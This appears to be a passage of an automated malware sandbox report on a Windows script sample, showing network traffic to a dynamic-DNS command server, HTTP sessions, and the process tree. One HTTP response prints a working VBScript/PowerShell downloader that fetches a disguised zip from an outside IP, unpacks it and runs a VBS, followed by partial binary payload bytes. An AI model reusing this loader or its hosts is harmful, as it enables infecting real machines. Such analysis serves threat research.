                                            Mar 14, 2024 16:37:37.751106024 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:38.983915091 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.157067060 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.157213926 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.277282000 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.342605114 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.462394953 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.464138031 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.625858068 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.625931025 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.798072100 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.530678034 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.703794003 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.703898907 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.824161053 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.873897076 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.993596077 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.995402098 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.157231092 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.157305956 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.329088926 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.329200983 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.449857950 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.498773098 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.619318962 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.621139050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.786149025 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.786199093 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.954144955 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:58.754430056 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:58.922477961 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:58.922558069 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.042572021 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.139422894 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.259438992 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.295207024 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.469700098 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.469767094 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.642195940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.072233915 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.139383078 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:03.259162903 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.342549086 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.297995090 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.469583988 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.469676971 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.589955091 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.639530897 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.762622118 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.764527082 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.938225985 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.938360929 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:09.110500097 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:14.608952045 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:14.781919003 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:14.782018900 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:14.902157068 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.030075073 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.150226116 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.151973963 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.313694954 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.313920975 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.485091925 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:22.702508926 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:22.875722885 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:22.875857115 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:22.995966911 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.139425993 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.259299040 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.261147022 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.422898054 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.423089027 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.594727039 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:26.686880112 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:26.860306025 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:26.860384941 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:26.980962038 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.139441967 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.259650946 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.342525005 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.435369015 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.610284090 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.610382080 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.782115936 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.071193933 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.139374971 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:33.259314060 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.342489004 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.258558989 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.422616005 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.422686100 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.542865992 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.639390945 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.759335041 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.760992050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.922611952 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.922672033 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:37.094372034 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:45.796246052 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:45.969927073 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:45.970019102 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.090212107 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.139401913 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.259632111 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.261352062 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.423476934 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.423584938 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.594821930 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:03.070924997 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:03.123815060 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:03.243601084 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:03.295614958 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.198153973 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.360174894 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.360227108 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.480751991 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.529989958 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.650088072 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.651108980 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.813684940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.813791037 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.985414982 CET666649712103.195.101.9192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 14, 2024 16:35:16.735136032 CET6302653192.168.2.61.1.1.1
                                            Mar 14, 2024 16:35:16.826168060 CET53630261.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 14, 2024 16:35:16.735136032 CET192.168.2.61.1.1.10xfb45Standard query (0)shefonew07.ddns.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 14, 2024 16:35:16.826168060 CET1.1.1.1192.168.2.60xfb45No error (0)shefonew07.ddns.net103.195.101.9A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 212.23.222.200:222

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649699212.23.222.2002224552C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 14, 2024 16:34:47.099097013 CET335OUTGET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1
                                            Accept: */*
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 212.23.222.200:222
                                            Connection: Keep-Alive
                                            Mar 14, 2024 16:34:47.290836096 CET1286INHTTP/1.1 200 OK
                                            Date: Thu, 14 Mar 2024 15:34:47 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Thu, 07 Mar 2024 00:48:25 GMT
                                            ETag: "437-613076ed20b8a"
                                            Accept-Ranges: bytes
                                            Content-Length: 1079
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/plain
                                            Data Raw: 53 65 74 20 51 50 4e 52 55 5a 56 59 49 44 44 4d 55 46 55 57 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 44 53 46 48 43 43 4e 52 4f 54 46 55 52 56 4b 50 20 3d 20 22 3c 63 6f 6d 6d 61 6e 64 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 3c 61 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 20 20 20 3c 65 78 65 63 75 74 65 3e 53 74 61 72 74 2d 42 69 74 73 54 72 61 6e 73 66 65 72 20 2d 53 6f 75 72 63 65 20 22 22 68 74 74 70 3a 2f 2f 32 31 32 2e 32 33 2e 32 32 32 2e 32 30 30 3a 32 32 32 2f 44 75 58 67 45 57 65 44 6d 45 51 49 50 58 6d 58 2f 4c 65 74 73 54 72 79 54 68 69 73 53 68 6f 74 2e 6a 70 67 22 22 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 3b 20 45 78 70 61 6e 64 2d 41 72 63 68 69 76 65 20 2d 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 22 22 20 2d 46 6f 72 63 65 3b 20 53 74 61 72 74 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 22 22 3b 20 52 65 6d 6f 76 65 2d 49 74 65 6d 20 2d 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 20 2d 46 6f 72 63 65 3c 2f 65 78 65 63 75 74 65 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 3c 2f 61 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 3c 2f 63 6f 6d 6d 61 6e 64 3e 22 0d 0a 0d 0a 53 65 74 20 49 4c 47 44 4b 47 57 4b 52 42 43 56 46 52 52 44 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 22 29 0d 0a 53 65 74 20 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 20 3d 20 49 4c 47 44 4b 47 57 4b 52 42 43 56 46 52 52 44 2e 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 28 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 4e 44 4b 4a 50 6c 45 45 59 4c 68 4b 71 74 47 57 2e 78 6d 6c 22 2c 20 54 72 75 65 29 0d 0a 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 2e 57 72 69 74 65 20 44 53 46 48 43 43 4e 52 4f 54 46 55 52 56 4b 50 0d 0a 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 2e 43 6c 6f 73 65 0d 0a 0d 0a 51 50 4e 52 55 5a 56 59 49 44 44 4d 55 46 55 57 2e 52 75 6e 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 22 22 5b 78 6d 6c 5d 24 78 6d 6c 64 6f 63 20 3d 20 47 65 74 2d 43 6f 6e 74 65 6e 74 20 27 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 4e 44 4b 4a 50 6c 45 45 59 4c 68 4b 71 74 47 57 2e 78 6d 6c 27 3b 20 24 63 6f 6d 6d 61 6e 64 20 3d 20 24 78 6d 6c 64 6f 63 2e 63 6f 6d 6d 61 6e 64 2e 61 2e 65 78 65 63 75 74 65 3b 20 49 6e 76 6f
                                            Data Ascii: Set QPNRUZVYIDDMUFUW = WScript.CreateObject("WScript.Shell")DSFHCCNROTFURVKP = "<command>" & _ " <a>" & _ " <execute>Start-BitsTransfer -Source ""http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg"" -Destination ""C:\Users\Public\sNGobbjhXGKsSanr.zip""; Expand-Archive -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs""; Remove-Item -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -Force</execute>" & _ " </a>" & _ "</command>"Set ILGDKGWKRBCVFRRD = CreateObject("Scripting.FileSystemObject")Set AXTKEDVJZQRYJAHD = ILGDKGWKRBCVFRRD.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", True)AXTKEDVJZQRYJAHD.Write DSFHCCNROTFURVKPAXTKEDVJZQRYJAHD.CloseQPNRUZVYIDDMUFUW.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.649703212.23.222.2002222096C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 14, 2024 16:34:54.673120022 CET177OUTHEAD /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            User-Agent: Microsoft BITS/7.8
                                            Host: 212.23.222.200:222
                                            Mar 14, 2024 16:34:54.858664989 CET314INHTTP/1.1 200 OK
                                            Date: Thu, 14 Mar 2024 15:34:54 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Thu, 07 Mar 2024 01:32:20 GMT
                                            ETag: "17b85-613080be7586c"
                                            Accept-Ranges: bytes
                                            Content-Length: 97157
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: image/jpeg
                                            Mar 14, 2024 16:34:54.893635035 CET228OUTGET /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Thu, 07 Mar 2024 01:32:20 GMT
                                            User-Agent: Microsoft BITS/7.8
                                            Host: 212.23.222.200:222
                                            Mar 14, 2024 16:34:55.079904079 CET1286INHTTP/1.1 200 OK
                                            Date: Thu, 14 Mar 2024 15:34:54 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Thu, 07 Mar 2024 01:32:20 GMT
                                            ETag: "17b85-613080be7586c"
                                            Accept-Ranges: bytes
                                            Content-Length: 97157
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: image/jpeg
                                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 c7 71 66 58 69 ec 44 a3 1d 01 00 00 55 02 00 00 18 00 00 00 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 95 92 3b 6f 83 40 10 84 fb 93 ee 3f 9c a8 1c 09 21 ea 48 29 12 82 b1 63 03 e1 e1 38 05 0d 8f c5 10 c1 81 ef 81 30 bf 3e d8 58 29 30 4d da d9 bd 99 6f b4 e7 52 62 32 d6 30 e2 03 97 35 10 07 7a 81 d1 7b 59 93 7c f0 84 94 dd 9e c1 65 13 da eb 72 52 2f ed e9 63 6f b9 67 bf 3b 08 d3 fe ea 26 35 6c dd f8 b5 e9 cf e5 60 15 14 76 06 46 f3 3d f2 42 d6 71 c5 01 a3 f9 ee 38 d1 31 0a 40 3c 24 8e 13 83 41 2c c0 4d 7e 20 15 2b e5 18 a4 ac 6c 85 16 14 50 55 ca d3 9d e8 fb b8 ce 8a e1 18 f8 b6 37 74 83 89 d1 5c 19 7d 14 3a fa 73 e0 bc 6c a8 b2 c8 30 0f d7 7c 49 57 73 27 95 e8 2a 09 99 84 31 7b 9b 93 a5 2a 24 2c 80 2e f6 bf be c3 c8 a4 19 d9 e6 13 3a f4 90 4a 31 22 19 4d 5d c7 34 c3 68 ae 5c d1 8d e7 e8 c0 81 f1 e8 53 26 55 99 46 74 e7 d4 70 da 78 6f 49 5d 79 76 e8 68 49 2c 94 1b cf 43 e8 c4 b2 54 ed 21 5b bd 5e c1 bc 5d e8 1f fb f7 32 7f bf c8 6a c2 86 e8 bf 50 4b 03 04 14 00 00 00 08 00 60 71 66 58 50 b6 2b 5b 66 01 00 00 1b 02 00 00 14 00 00 00 44 6e 57 45 64 46 50 65 6d 5a 76 64 74 4b 52 73 2e 70 73 31 5d 51 bb 6e eb 30 0c dd 2f d0 7f 10 8c 0e 0e d0 08 7d 00 77 30 d0 a1 75 fa c8 90 36 88 dd bb 34 1d 14 8b 71 d4 c8 52 40 d2 09 fc f7 95 14 a3 c3 d5 42 f1 71 c8 c3 c3 8b 3f 97 ed 20 ee c5 1b 9c a6 ef 9b 6f 68 58 4c 4b df 8d df aa d9 81 ee 2d c8 0a f0 68 1a 48 d5 b2 f4 ce 85 6c 3e 09 2e eb 00 8e c1 d0 a0 56 b4 cf af cf 51 b9 82 d6 10 a3 62 e3 dd dc 6d bd 9c 01 35 68 0e d1 0f 90 6c d5 3b 12 4a 9c 63 02 8e 80 83 b8 15 9d 71 3d 03 65 e7 1e 15 30 1b d7 92 7c 72 6a 63 21 8d 62 ec e1 bf ec cc 90 b2 d6 9f 2a 56 c8 f3 ed bb 7b 54 cc 80 06 28 02 b6 ca 52 44 10 27 b8 96 35 9a b6 05 24 59 22 28 86 fc 66 92 b2 32 c1 1f 7d ef b4 c2 28 c9 e7 2c 64 6b d3 c1 57 51 bc f9 93 ac 7d c5 18 06 e6 d9 10 de 74 b1 98 6a 5d bf be 16 5d 57 10 65 63 93 15 1c 80 4d 5c 52 ce 5d 20 71 54 36 6e bb ac 6f 17 71 a9 61 3f 92 78 68 62 cd 2f 87 a4 da b0 97 4b c5 bb 58 5f 16 eb 0f 0a 1c d7 cb 7e 63 4d b3 0e ea ae f4 e1 d9 20 71 8d 83 3c 6e 92 44 8e 46 f1 5f 80 9f bd d5 80 79 b6 4e 4c 1c 8d 07 00 8c 57 99 c1 d6 b8 c4 2a cf ca 1d fa 0e 3e 0e 3a cc fd 77 93 5d 45 3a 57 e2 6f b0 ae b7 f6 d7 dc 4d 7e 00 50 4b 03 04 14 00 00 00 08 00 87 71 66 58 fc 15 3f f5 1e 01 00 00 58 02 00 00 12 00 00 00 4e 65 77 52 64 70 46 69 72 73 74 54 72 79 2e 76 62 73 95 52 cf 6f 82 30 14 be 37 e1 7f 68 38 b9 c4 10 cf 4b 76 58 90 11 c8 14 10 c8 cc e2 05 e8 43 3b b1 95 b6 e0 c6 5f bf 2a 66 87 ca 65 c7 7e ef eb f7 23 ef 45 0c 7b 42 70 81 37 20 bb 13 e0 35 7c 2b 0b 2d e9 09 c7 51 15 0c 4b 22 bc 75 fb 9e b5 3f ab 11 cd 7b c1 c2 be 4b 68 22 52 ff 13 92 11 55 2b 96 a5 b9 7f 6c 4e 6d 11 f1 a8 b5 90 c9 c3 2f f8 ad 68 24 58 c8 e4 ea c9 c2 42 29 a8 07 47 3d 71 05 14 0a a2 f2 0b 2a 35 b3 3f d2 4a d0 b3 72 d2 03 34 8d fd 34 7a fb 8a d5 70 c9 5f 2f e7 3e 59 c6 a1 4e 6f 22 5a c7 66 5a 5f 82 94 94 33 7b 32
                                            Data Ascii: PKqfXiDUTextCZvTbYMEYspgaPVo.vbs;o@?!H)c80>X)0MoRb205z{Y|erR/cog;&5l`vF=Bq81@<$A,M~ +lPU7t\}:sl0|IWs'*1{*$,.:J1"M]4h\S&UFtpxoI]yvhI,CT![^]2jPK`qfXP+[fDnWEdFPemZvdtKRs.ps1]Qn0/}w0u64qR@Bq? ohXLK-hHl>.VQbm5hl;Jcq=e0|rjc!b*V{T(RD'5$Y"(f2}(,dkWQ}tj]]WecM\R] qT6noqa?xhb/KX_~cM q<nDF_yNLW*>:w]E:WoM~PKqfX?XNewRdpFirstTry.vbsRo07h8KvXC;_*fe~#E{Bp7 5|+-QK"u?{Kh"RU+lNm/h$XB)G=q*5?Jr44zp_/>YNo"ZfZ_3{2


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:34:45
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:16:34:46
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:16:34:46
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:16:34:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff7403e0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:16:34:57
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
